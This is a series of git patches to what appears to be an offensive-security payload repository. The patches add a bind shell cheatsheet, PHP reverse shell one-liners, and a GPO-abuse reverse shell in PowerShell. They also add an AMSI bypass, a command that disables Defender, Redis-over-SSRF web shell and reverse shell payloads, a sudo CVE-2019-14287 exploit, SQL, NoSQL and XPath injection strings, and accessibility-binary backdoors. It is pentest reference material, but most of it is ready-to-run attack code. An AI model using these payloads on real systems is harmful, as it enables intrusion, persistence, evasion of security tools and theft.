+* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
\ No newline at end of file
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index bd4ca44..963d807 100644
--- a/Methodology and Resources/Windows - Persistence.md	
+++ b/Methodology and Resources/Windows - Persistence.md	
@@ -16,7 +16,12 @@
     * [HKLM](#hklm)
     * [Services](#services)
     * [Scheduled Task](#scheduled-task)
+    * [Binary Replacement](#binary-replacement)
+        * [Binary Replacement on Windows XP+](#binary-replacement-on-windows-xp)
+        * [Binary Replacement on Windows 10+](#binary-replacement-on-windows-10)
     * [RDP Backdoor](#rdp-backdoor)
+        * [utilman.exe](#utilman.exe)
+        * [sethc.exe](#sethc.exe)
     * [Skeleton Key](#skeleton-key)
 * [References](#references)
 
@@ -157,6 +162,27 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
 PS C:\> Register-ScheduledTask Backdoor -InputObject $D
 ```
 
+### Binary Replacement
+
+#### Binary Replacement on Windows XP+
+
+| Feature             | Executable                            |
+|---------------------|---------------------------------------|
+| Sticky Keys         | C:\Windows\System32\sethc.exe         |
+| Accessibility Menu  | C:\Windows\System32\utilman.exe       |
+| On-Screen Keyboard  | C:\Windows\System32\osk.exe           |
+| Magnifier           | C:\Windows\System32\Magnify.exe       |
+| Narrator            | C:\Windows\System32\Narrator.exe      |
+| Display Switcher    | C:\Windows\System32\DisplaySwitch.exe |
+| App Switcher        | C:\Windows\System32\AtBroker.exe      |
+
+#### Binary Replacement on Windows 10+
+
+Exploit a DLL hijacking vulnerability in the On-Screen Keyboard **osk.exe** executable.
+
+Create a malicious **HID.dll** in  `C:\Program Files\Common Files\microsoft shared\ink\HID.dll`.
+
+
 ### RDP Backdoor
 
 #### utilman.exe
@@ -190,4 +216,5 @@ Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\Administr
 * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
 * [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
 * [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo)
-* [](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/)
\ No newline at end of file
+* [IIS Raid – Backdooring IIS Using Native Modules - 19/02/2020](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/)
+* [Old Tricks Are Always Useful: Exploiting Arbitrary File Writes with Accessibility Tools - Apr 27, 2020 - @phraaaaaaa](https://iwantmore.pizza/posts/arbitrary-write-accessibility-tools.html)
\ No newline at end of file

From 7b8514f1f5cc128bc4f64f926e44ddec8d364e6f Mon Sep 17 00:00:00 2001
From: vict0ni <32034171+victoni@users.noreply.github.com>
Date: Thu, 14 May 2020 00:09:30 +0200
Subject: [PATCH 58/85] Update README.md

Added "adding magic bytes" solution
---
 Upload Insecure Files/README.md | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md
index 6229f86..ed537da 100644
--- a/Upload Insecure Files/README.md	
+++ b/Upload Insecure Files/README.md	
@@ -65,6 +65,8 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm
     * `Content-Type : image/gif`
     * `Content-Type : image/png`
     * `Content-Type : image/jpeg`
+- [Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures)
+    Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.
 
 ### Picture upload with LFI
 
@@ -95,4 +97,4 @@ Touch command
 * [BookFresh Tricky File Upload Bypass to RCE, NOV 29, 2014 - AHMED ABOUL-ELA](https://secgeek.net/bookfresh-vulnerability/)
 * [Encoding Web Shells in PNG IDAT chunks, 04-06-2012, phil](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
 * [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/)
-* [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf)
\ No newline at end of file
+* [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf)

From e61db57ff107ff39d7500d1ff8b4f3370eaa5780 Mon Sep 17 00:00:00 2001
From: vict0ni <32034171+victoni@users.noreply.github.com>
Date: Thu, 14 May 2020 00:10:12 +0200
Subject: [PATCH 59/85] Update README.md

fixed indentation
---
 Upload Insecure Files/README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md
index ed537da..1ffa55c 100644
--- a/Upload Insecure Files/README.md	
+++ b/Upload Insecure Files/README.md	
@@ -66,6 +66,7 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm
     * `Content-Type : image/png`
     * `Content-Type : image/jpeg`
 - [Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures)
+    
     Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.
 
 ### Picture upload with LFI

From c1731041b5c9780c238197acf15dc66241f53947 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 16 May 2020 13:22:55 +0200
Subject: [PATCH 60/85] Misc & Tricks Page + AMSI + Defender

---
 .../Cloud - Azure Pentest.md                  | 15 +++++-
 .../Miscellaneous - Tricks.md                 | 17 ++++++
 .../Windows - Privilege Escalation.md         | 52 ++++++++++++++++++-
 3 files changed, 81 insertions(+), 3 deletions(-)
 create mode 100644 Methodology and Resources/Miscellaneous - Tricks.md

diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md
index f8c1857..056261a 100644
--- a/Methodology and Resources/Cloud - Azure Pentest.md	
+++ b/Methodology and Resources/Cloud - Azure Pentest.md	
@@ -205,6 +205,19 @@ PS C:\> .\AzureADRecon.ps1 -Credential $creds
 PS C:\>.\AzureADRecon.ps1 -GenExcel C:\AzureADRecon-Report-<timestamp>
 ```
 
+Stormspotter,  graphing Azure and Azure Active Directory objects
+
+```powershell
+$ docker run --name stormspotter -p7474:7474 -p7687:7687 -d --env NEO4J_AUTH=neo4j/[password] neo4j:3.5.18
+git clone https://github.com/Azure/Stormspotter
+cd Stormspotter
+pipenv install .
+stormspotter --cli
+stormdash -dbu <neo4j-user> -dbp <neo4j-pass>
+Browse to http://127.0.0.1:8050 to interact with the graph.
+```
+
+Other interesting commands to enumerate Azure AD.
 
 ```powershell
 # Azure AD powershell module
@@ -470,7 +483,7 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an
 ## References
 
 * [An introduction to penetration testing Azure - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-azure/)
-* [Running POwershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/)
+* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/)
 * [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/)
 * [Maintaining Azure Persistence via automation accounts - Netspi](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/)
 * [Detecting an attacks on active directory with Azure - Smartspate](https://www.smartspate.com/detecting-an-attacks-on-active-directory-with-azure/)
diff --git a/Methodology and Resources/Miscellaneous - Tricks.md b/Methodology and Resources/Miscellaneous - Tricks.md
new file mode 100644
index 0000000..1794178
--- /dev/null
+++ b/Methodology and Resources/Miscellaneous - Tricks.md	
@@ -0,0 +1,17 @@
+# Miscellaneous & Tricks
+
+All the tricks that couldn't be classified somewhere else.
+
+## Send a message to another user
+
+```powershell
+# Windows
+PS C:\> msg Swissky /SERVER:CRASHLAB "Stop rebooting the XXXX service !"
+PS C:\> msg * /V /W /SERVER:CRASHLAB "Hello all !"
+
+# Linux
+$ wall "Stop messing with the XXX service !"
+$ wall -n "System will go down for 2 hours maintenance at 13:00 PM"  # "-n" only for root
+$ who
+$ write root pts/2	# press Ctrl+D  after typing the message. 
+```
\ No newline at end of file
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index f71519c..095b4ed 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md	
+++ b/Methodology and Resources/Windows - Privilege Escalation.md	
@@ -6,7 +6,11 @@
 * [Windows Version and Configuration](#windows-version-and-configuration)
 * [User Enumeration](#user-enumeration)
 * [Network Enumeration](#network-enumeration)
-* [AppLocker Enumeration](#applocker-enumeration)
+* [Antivirus & Detections](#antivirus--detections)
+    * [Windows Defender](#windows-defender)
+    * [AppLocker Enumeration](#applocker-enumeration)
+    * [Powershell](#powershell)
+    * [Default Writeable Folders](#default-writeable-folders)
 * [EoP - Looting for passwords](#eop---looting-for-passwords)
     * [SAM and SYSTEM files](#sam-and-system-files)
     * [Search for file contents](#search-for-file-contents)
@@ -223,11 +227,55 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
 Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
 ```
 
-## AppLocker Enumeration
+## Antivirus & Detections
+
+### Windows Defender
+
+```powershell
+# check status of Defender
+PS C:\> Get-MpComputerStatus
+
+# disable Real Time Monitoring
+PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
+```
+
+### AppLocker Enumeration
 
 - With the GPO
 - HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
 
+List AppLocker rules
+
+```powershell
+PS C:\> $a = Get-ApplockerPolicy -effective
+PS C:\> $a.rulecollections
+```
+
+### Powershell
+
+Default powershell locations in a Windows system.
+
+```powershell
+C:\windows\syswow64\windowspowershell\v1.0\powershell
+C:\Windows\System32\WindowsPowerShell\v1.0\powershell
+```
+
+Example of AMSI Bypass.
+
+```powershell
+PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
+```
+
+
+### Default Writeable Folders
+
+```powershell
+C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
+C:\Windows\System32\spool\drivers\color
+C:\Windows\Tasks
+C:\windows\tracing
+```
+
 ## EoP - Looting for passwords
 
 ### SAM and SYSTEM files

From cb8bf8ea668bd7d814e543693dae36cdab411a71 Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Sat, 16 May 2020 22:58:11 +0200
Subject: [PATCH 61/85] add more refs

---
 Insecure Deserialization/PHP.md | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/Insecure Deserialization/PHP.md b/Insecure Deserialization/PHP.md
index a082110..3dfa63d 100644
--- a/Insecure Deserialization/PHP.md	
+++ b/Insecure Deserialization/PHP.md	
@@ -161,5 +161,7 @@ phpggc monolog/rce1 'phpinfo();' -s
 * [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains)
 * [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf)
 * [PHP Internals Book - Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html)
-* [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/MeePwn-2017-write-ups/#tsulott-web)
+* [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/meepwn-2017-write-ups/#TSULOTT-Web)
 * [CTF writeup: PHP object injection in kaspersky CTF](https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d)
+* [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://rawsec.ml/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web)
+* [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41)

From 4ca5e71c2fecfc8b556ecf9e35ab249a2ed878bd Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 24 May 2020 14:09:46 +0200
Subject: [PATCH 62/85] Bind shell cheatsheet (Fix #194)

---
 CORS Misconfiguration/README.md               |  5 ++
 Command Injection/README.md                   | 14 ++--
 .../Active Directory Attack.md                | 18 ++++-
 .../Bind Shell Cheatsheet.md                  | 71 +++++++++++++++++++
 .../Network Pivoting Techniques.md            |  3 +
 .../Reverse Shell Cheatsheet.md               |  5 ++
 NoSQL Injection/README.md                     |  5 +-
 SQL Injection/README.md                       |  4 +-
 Server Side Request Forgery/README.md         | 19 +++++
 XPATH Injection/README.md                     |  3 +
 10 files changed, 134 insertions(+), 13 deletions(-)
 create mode 100644 Methodology and Resources/Bind Shell Cheatsheet.md

diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md
index 1bbbc7e..138fb1c 100644
--- a/CORS Misconfiguration/README.md	
+++ b/CORS Misconfiguration/README.md	
@@ -4,10 +4,15 @@
 
 ## Summary
 
+* [Tools](#tools)
 * [Prerequisites](#prerequisites)
 * [Exploitation](#exploitation)
 * [References](#references)
 
+## Tools
+
+* [Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3vCorsy/)
+
 ## Prerequisites
 
 * BURP HEADER> `Origin: https://evil.com`
diff --git a/Command Injection/README.md b/Command Injection/README.md
index 8370522..ba3850f 100644
--- a/Command Injection/README.md	
+++ b/Command Injection/README.md	
@@ -111,8 +111,9 @@ something%0Acat%20/etc/passwd
 
 ### Bypass characters filter via hex encoding
 
-linux
-```
+Linux
+
+```powershell
 swissky@crashlab▸ ~ ▸ $ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
 /etc/passwd
 
@@ -136,29 +137,22 @@ swissky@crashlab▸ ~ ▸ $ xxd -r -ps <(echo 2f6574632f706173737764)
 
 swissky@crashlab▸ ~ ▸ $ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
 root:x:0:0:root:/root:/bin/bash
-
 ```
 
 ### Bypass characters filter
 
 Commands execution without backslash and slash - linux bash
 
-```
+```powershell
 swissky@crashlab▸ ~ ▸ $ echo ${HOME:0:1}
-/
 
 swissky@crashlab▸ ~ ▸ $ cat ${HOME:0:1}etc${HOME:0:1}passwd
 root:x:0:0:root:/root:/bin/bash
 
 swissky@crashlab▸ ~ ▸ $ echo . | tr '!-0' '"-1'
-/
-
 swissky@crashlab▸ ~ ▸ $ tr '!-0' '"-1' <<< .
-/
-
 swissky@crashlab▸ ~ ▸ $ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
 root:x:0:0:root:/root:/bin/bash
-
 ```
 
 ### Bypass Blacklisted words
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 12efdd6..7a97f84 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -427,7 +427,23 @@ SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContent
 SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
 ```
 
-Abuse GPO with PowerView
+Abuse GPO with **pyGPOAbuse**
+
+```powershell
+git clone https://github.com/Hackndo/pyGPOAbuse
+# Add john user to local administrators group (Password: H4x00r123..)
+./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
+
+# Reverse shell example
+./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
+    -powershell \ 
+    -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ 
+    -taskname "Completely Legit Task" \
+    -description "Dis is legit, pliz no delete" \ 
+    -user
+```
+
+Abuse GPO with **PowerView**
 
 ```powershell
 # Enumerate GPO
diff --git a/Methodology and Resources/Bind Shell Cheatsheet.md b/Methodology and Resources/Bind Shell Cheatsheet.md
new file mode 100644
index 0000000..73df69d
--- /dev/null
+++ b/Methodology and Resources/Bind Shell Cheatsheet.md	
@@ -0,0 +1,71 @@
+# Bind Shell
+
+## Summary
+
+* [Reverse Shell](#reverse-shell)
+    * [Perl](#perl)
+    * [Python](#python)
+    * [PHP](#php)
+    * [Ruby](#ruby)
+    * [Netcat Traditional](#netcat-traditional)
+    * [Netcat OpenBsd](#netcat-openbsd)
+    * [Ncat](#ncat)
+    * [Socat](#socat)
+    * [Powershell](#powershell)
+
+
+## Perl
+
+```perl
+perl -e 'use Socket;$p=51337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));\
+bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\
+close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};'
+```
+
+## PHP
+
+```php
+php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",51337);\
+socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;\
+$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);\
+    socket_write($cl,$m,strlen($m));}}'
+```
+
+## Ruby
+
+```ruby
+ruby -rsocket -e 'f=TCPServer.new(51337);s=f.accept;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)'
+```
+
+## Netcat Traditional
+
+```powershell
+nc -nlvp 51337 -e /bin/bash
+```
+
+## Netcat OpenBsd
+
+```powershell
+rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 51337 >/tmp/f
+```
+
+## Socat
+
+```powershell
+user@attacker$ socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 
+user@victim$ socat TCP-LISTEN:12345,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane
+```
+
+## Powershell
+
+```powershell
+https://github.com/besimorhino/powercat
+
+# Victim (listen)
+. .\powercat.ps1
+powercat -l -p 7002 -ep
+
+# Connect from attacker
+. .\powercat.ps1
+powercat -c 127.0.0.1 -p 7002
+```
\ No newline at end of file
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md
index f2fbcd6..78958b0 100644
--- a/Methodology and Resources/Network Pivoting Techniques.md	
+++ b/Methodology and Resources/Network Pivoting Techniques.md	
@@ -154,6 +154,9 @@ sshuttle -vvr username@pivot_host 10.2.2.0/24
 
 # using a private key
 $ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa" 
+
+# -x == exclude some network to not transmit over the tunnel
+# -x x.x.x.x.x/24
 ```
 
 ## chisel
diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index a728c33..0362a8a 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md	
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md	
@@ -114,6 +114,11 @@ C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('1
 
 ```bash
 php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
+php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
+php -r '$sock=fsockopen("10.0.0.1",4242);`/bin/sh -i <&3 >&3 2>&3`;'
+php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");'
+php -r '$sock=fsockopen("10.0.0.1",4242);passthru("/bin/sh -i <&3 >&3 2>&3");'
+php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
 ```
 
 ```bash
diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md
index 7c203b8..cebfe1b 100644
--- a/NoSQL Injection/README.md	
+++ b/NoSQL Injection/README.md	
@@ -27,8 +27,11 @@
 Basic authentication bypass using not equal ($ne) or greater ($gt)
 
 ```json
-in URL
+in DATA
 username[$ne]=toto&password[$ne]=toto
+login[$regex]=a.*&pass[$ne]=lol
+login[$gt]=admin&login[$lt]=test&pass[$ne]=1
+login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
 
 in JSON
 {"username": {"$ne": null}, "password": {"$ne": null}}
diff --git a/SQL Injection/README.md b/SQL Injection/README.md
index f3eeb33..353feca 100644
--- a/SQL Injection/README.md	
+++ b/SQL Injection/README.md	
@@ -31,6 +31,7 @@ Attempting to manipulate SQL queries may have goals including:
   * [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
   * [General tamper option and tamper's list](#general-tamper-option-and-tampers-list)
 * [Authentication bypass](#authentication-bypass)
+  * [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1)
 * [Polyglot injection](#polyglot-injection-multicontext)
 * [Routed injection](#routed-injection)
 * [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update)
@@ -365,7 +366,7 @@ admin") or "1"="1"/*
 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
 ```
 
-## Authentication Bypass (Raw MD5)
+## Authentication Bypass (Raw MD5 SHA1)
 
 When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.
 
@@ -377,6 +378,7 @@ Allowing an attacker to craft a string with a `true` statement such as `' or 'SO
 
 ```php
 md5("ffifdyop", true) = 'or'6�]��!r,��b
+sha1("3fDf ", true) = Q�u'='�@�[�t�- o��_-!
 ```
 
 Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772)
diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index da3fcfa..964f300 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -31,6 +31,7 @@
   * [gopher://](#gopher)
   * [netdoc://](#netdoc)
 * [SSRF exploiting WSGI](#ssrf-exploiting-wsgi)
+* [SSRF exploiting Redis](#ssrf-exploiting-redis)
 * [SSRF to XSS](#ssrf-to-xss)
 * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
   * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
@@ -388,6 +389,24 @@ gopher://localhost:8000/_%00%1A%00%00%0A%00UWSGI_FILE%0C%00/tmp/test.py
 | value data            | (n bytes) |    | /tmp/test.py   |   |
 	
 
+## SSRF exploiting Redis
+
+> Redis is a database system that stores everything in RAM
+
+```powershell
+# Getting a webshell
+url=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html
+url=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20file.php
+url=dict://127.0.0.1:6379/SET%20mykey%20"<\x3Fphp system($_GET[0])\x3F>"
+url=dict://127.0.0.1:6379/SAVE
+
+# Getting a PHP reverse shell
+gopher://127.0.0.1:6379/_config%20set%20dir%20%2Fvar%2Fwww%2Fhtml
+gopher://127.0.0.1:6379/_config%20set%20dbfilename%20reverse.php
+gopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec%28%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FREMOTE_IP%2FREMOTE_PORT%200%3E%261%27%29%3B%3F%3E%22
+gopher://127.0.0.1:6379/_save
+```
+
 ## SSRF to XSS 
 
 by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md
index bcbe72e..6e0ac6d 100644
--- a/XPATH Injection/README.md	
+++ b/XPATH Injection/README.md	
@@ -28,6 +28,9 @@ x' or name()='username' or 'x'='y
 ' and count(/*)=1 and '1'='1
 ' and count(/@*)=1 and '1'='1
 ' and count(/comment())=1 and '1'='1
+search=')] | //user/*[contains(*,'
+search=Har') and contains(../password,'c
+search=Har') and starts-with(../password,'c
 ```
 
 ## Blind Exploitation

From 5b47fc8ead951df64fbc928efbe8a2d2a4f734e4 Mon Sep 17 00:00:00 2001
From: c14dd49h <47661120+c14dd49h@users.noreply.github.com>
Date: Wed, 27 May 2020 18:53:37 +0200
Subject: [PATCH 63/85] Update README.md

---
 SQL Injection/README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/SQL Injection/README.md b/SQL Injection/README.md
index 353feca..1ab29b8 100644
--- a/SQL Injection/README.md	
+++ b/SQL Injection/README.md	
@@ -344,6 +344,7 @@ admin') or '1'='1'#
 admin') or '1'='1'/*
 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
 admin" --
+admin';-- azer 
 admin" #
 admin"/*
 admin" or "1"="1

From 5323ceb37c4eb4b98b82d0ad2cfe07cc390f8b0e Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Thu, 28 May 2020 11:19:16 +0200
Subject: [PATCH 64/85] SUDO CVE + Windows Drivers PrivEsc

---
 .../Active Directory Attack.md                |   4 +-
 .../Linux - Privilege Escalation.md           |  13 ++
 .../Windows - Privilege Escalation.md         |  26 ++++
 .../Windows - Using credentials.md            | 119 ++++++++++++------
 4 files changed, 121 insertions(+), 41 deletions(-)

diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 7a97f84..0e206fa 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -767,8 +767,8 @@ Alternatively on macOS machine you can use [bifrost](https://github.com/its-a-fe
 Then crack the ticket with hashcat or john
 
 ```powershell
-hashcat -m 13100 -a 0 hash.txt crackstation.txt
-./john ~/hash.txt --wordlist=rockyou.lst
+./hashcat -m 13100 -a 0 kerberos_hashes.txt crackstation.txt
+./john --wordlist=/opt/wordlists/rockyou.txt --fork=4 --format=krb5tgs ~/kerberos_hashes.txt
 ```
 
 Mitigations: 
diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md
index db7a558..acc6b89 100644
--- a/Methodology and Resources/Linux - Privilege Escalation.md	
+++ b/Methodology and Resources/Linux - Privilege Escalation.md	
@@ -28,6 +28,7 @@
     * [LD_PRELOAD and NOPASSWD](#ld_preload-and-nopasswd)
     * [Doas](#doas)
     * [sudo_inject](#sudo-inject)
+    * [CVE-2019-14287](#cve-2019-14287)
 * [GTFOBins](#gtfobins)
 * [Wildcard](#wildcard)
 * [Writable files](#writable-files)
@@ -389,6 +390,7 @@ uid=0(root) gid=1000(swissky)
 | CAP_NET_BIND_SERVICE  | SERVICE Bind a socket to internet domain privileged ports  |
 
 ## SUDO
+
 Tool: [Sudo Exploitation](https://github.com/TH3xACE/SUDO_KILLER)
 
 ### NOPASSWD
@@ -459,6 +461,17 @@ uid=0(root) gid=0(root) groups=0(root)
 
 Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf](https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf)
 
+
+### CVE-2019-14287
+
+```powershell
+# Exploitable when a user have the following permissions (sudo -l)
+(ALL, !root) ALL
+
+# If you have a full TTY, you can exploit it like this
+sudo -u#-1 /bin/bash
+```
+
 ## GTFOBins
 
 [GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index 095b4ed..7f77e38 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md	
+++ b/Methodology and Resources/Windows - Privilege Escalation.md	
@@ -28,6 +28,7 @@
 * [EoP - Kernel Exploitation](#eop---kernel-exploitation)
 * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated)
 * [EoP - Insecure GUI apps](#eop---insecure-gui-apps)
+* [EoP - Evaluating Vulnerable Drivers](#eop---evaluating-vulnerable-drivers)
 * [EoP - Runas](#eop---runas)
 * [EoP - Abusing Shadow Copies](#eop---abusing-shadow-copies)
 * [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system)
@@ -68,6 +69,11 @@
 - [WindowsExploits - Windows exploits, mostly precompiled. Not being updated.](https://github.com/abatchy17/WindowsExploits)
 - [WindowsEnum - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum)
 - [Seatbelt - A C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.](https://github.com/GhostPack/Seatbelt)
